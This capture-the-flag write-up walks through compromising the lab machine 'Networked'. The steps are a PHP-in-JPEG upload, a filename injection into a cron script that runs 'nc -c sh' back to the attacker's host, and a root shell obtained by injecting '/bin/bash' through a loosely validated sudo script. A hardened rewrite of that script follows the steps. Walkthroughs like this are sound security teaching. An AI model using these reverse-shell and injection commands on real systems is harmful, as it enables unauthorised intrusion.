We find a backup directory on the web server that allows us to read the source code of the PHP upload application.
We use GNU GIMP to embed PHP code in the comment field of the image properties and upload the JPEG to get command execution and a reverse shell.
Got user guly by exploiting a cron job that executes a PHP script every 3 minutes.
Got root by exploiting a shell script that changes settings related to the network interfaces.
Tools Used:
nmap, ffuf, GNU GIMP, ncat
Nmap
# Nmap 7.80 scan initiated Mon May 4 12:46:19 2020 as: nmap -sC -sV -p- -oA nmap/allports 10.10.10.146
Nmap scan report for 10.10.10.146
Host is up (0.54s latency).
Not shown: 65532 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey:
| 2048 22:75:d7:a7:4f:81:a7:af:52:66:e5:27:44:b1:01:5b (RSA)
| 256 2d:63:28:fc:a2:99:c7:d4:35:b9:45:9a:4b:38:f9:c8 (ECDSA)
|_ 256 73:cd:a0:5b:84:10:7d:a7:1c:7c:61:1d:f5:54:cf:c4 (ED25519)
80/tcp open http Apache httpd 2.4.6 ((CentOS) PHP/5.4.16)
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.6 (CentOS) PHP/5.4.16
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
443/tcp closed https
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon May 4 13:12:58 2020 -- 1 IP address (1 host up) scanned in 1599.45 seconds
Checking the backup directory, we noticed a backup.tar file containing the same PHP files we had found using ffuf:
-rw-r--r-- 1 kali kali 10240 May 4 12:51 backup.tar
-rw-r--r-- 1 kali kali 229 Jul 9 2019 index.php
-rw-r--r-- 1 kali kali 2001 Jul 2 2019 lib.php
-rw-r--r-- 1 kali kali 1871 Jul 2 2019 photos.php
-rw-r--r-- 1 kali kali 1331 Jul 2 2019 upload.php
Checking The Files Found
Analysis of the upload.php code
Exploit
We tried uploading a PHP webshell, but it was rejected. However, when we uploaded a JPEG, it was accepted.
Embedding php code on a JPEG
We use GNU GIMP to embed PHP code in the comment field of the image properties.
We get command execution and catch a shell with ncat:
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::9001
Ncat: Listening on 0.0.0.0:9001
Ncat: Connection from 10.10.10.146.
Ncat: Connection from 10.10.10.146:49080.
id
uid=48(apache) gid=48(apache) groups=48(apache)
python -c 'import pty;pty.spawn("/bin/bash")'
bash-4.2$ id
id
uid=48(apache) gid=48(apache) groups=48(apache)
Privilege Escalation
Getting User Guly
The user flag is in guly's home directory, but we can't read it yet. There are some files we can read; one of them is a crontab that executes the check_attack.php script every 3 minutes.
1) The script iterates over /var/www/html/uploads and checks every file in it.
2) It performs a grep-like check to skip files that begin with a . (hidden files).
3) It checks file names and extensions and sends an email if it finds a file whose extension is not in the list of valid extensions.
To exploit the PHP script, we run the following command to create a file whose name gets us a shell: touch 'wtf;nc -c sh 10.10.14.22 9001;.php'
This makes the PHP script execute wtf (which does nothing) and then the netcat command, which connects back to our Kali box.
# under /var/www/html/uploads
touch 'wtf;nc -c sh 10.10.14.22 9001;.php'
# Got a shell
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::9001
Ncat: Listening on 0.0.0.0:9001
Ncat: Connection from 10.10.10.146.
Ncat: Connection from 10.10.10.146:49106.
id
uid=1000(guly) gid=1000(guly) groups=1000(guly)
Getting Root
# To get root
[guly@networked ~]$ sudo -l
sudo -l
Matching Defaults entries for guly on networked:
!visiblepw, always_set_home, match_group_by_gid, always_query_group_plugin,
env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE KDEDIR LS_COLORS",
env_keep+="MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE",
env_keep+="LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES",
env_keep+="LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE",
env_keep+="LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY",
secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin
User guly may run the following commands on networked:
(root) NOPASSWD: /usr/local/sbin/changename.sh
[guly@networked ~]$
# The script
[guly@networked ~]$ cat /usr/local/sbin/changename.sh
cat /usr/local/sbin/changename.sh
#!/bin/bash -p
cat > /etc/sysconfig/network-scripts/ifcfg-guly << EoF
DEVICE=guly0
ONBOOT=no
NM_CONTROLLED=no
EoF
regexp="^[a-zA-Z0-9_\ /-]+$"
for var in NAME PROXY_METHOD BROWSER_ONLY BOOTPROTO; do
echo "interface $var:"
read x
while [[ ! $x =~ $regexp ]]; do
echo "wrong input, try again"
echo "interface $var:"
read x
done
echo $var=$x >> /etc/sysconfig/network-scripts/ifcfg-guly
done
/sbin/ifup guly0
The regex allows spaces, so we can use them to execute additional commands. For example:
eth0 /bin/bash
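The weak point in the script above is the value check: its regex accepts spaces, and the ifcfg file it writes is read as shell by the network scripts. As an added example (not the box's script and not part of this writeup), here is a hardened rewrite of that check and the file write in POSIX shell; the names valid_value, write_ifcfg and demo are assumptions.

```shell
#!/bin/sh
# Added example: hardened replacement for the value check in changename.sh.
# The original pattern  ^[a-zA-Z0-9_\ /-]+$  admits "eth0 /bin/bash", and
# because ifcfg-* files are read as shell by the network scripts, an unquoted
# NAME=eth0 /bin/bash line runs /bin/bash with the script's privileges.
# Two fixes: reject whitespace and slashes (none of NAME, PROXY_METHOD,
# BROWSER_ONLY or BOOTPROTO needs them), and always write the value quoted.

# valid_value VALUE: return 0 only for a non-empty token of [A-Za-z0-9_-]
valid_value() {
    case $1 in
        '' | *[!a-zA-Z0-9_-]*) return 1 ;;
        *) return 0 ;;
    esac
}

# write_ifcfg FILE VAR VALUE: append VAR="VALUE" to FILE, or refuse the value
write_ifcfg() {
    _file=$1; _var=$2; _value=$3
    valid_value "$_value" || { echo "rejected value for $_var" >&2; return 1; }
    printf '%s="%s"\n' "$_var" "$_value" >> "$_file"
}

# demo: build a file the way the script does, using the hardened helpers,
# then source it and confirm that only variable assignments took place.
demo() {
    _f=$(mktemp) || return 1
    write_ifcfg "$_f" NAME eth0 || return 1
    write_ifcfg "$_f" BOOTPROTO none || return 1
    # the injection attempt from the writeup must be refused
    write_ifcfg "$_f" NAME 'eth0 /bin/bash' && return 1
    . "$_f"
    rm -f "$_f"
    [ "$NAME" = eth0 ] && [ "$BOOTPROTO" = none ]
}
```

Running demo writes the two accepted values, refuses the injected one, and leaves only NAME and BOOTPROTO set after sourcing the file.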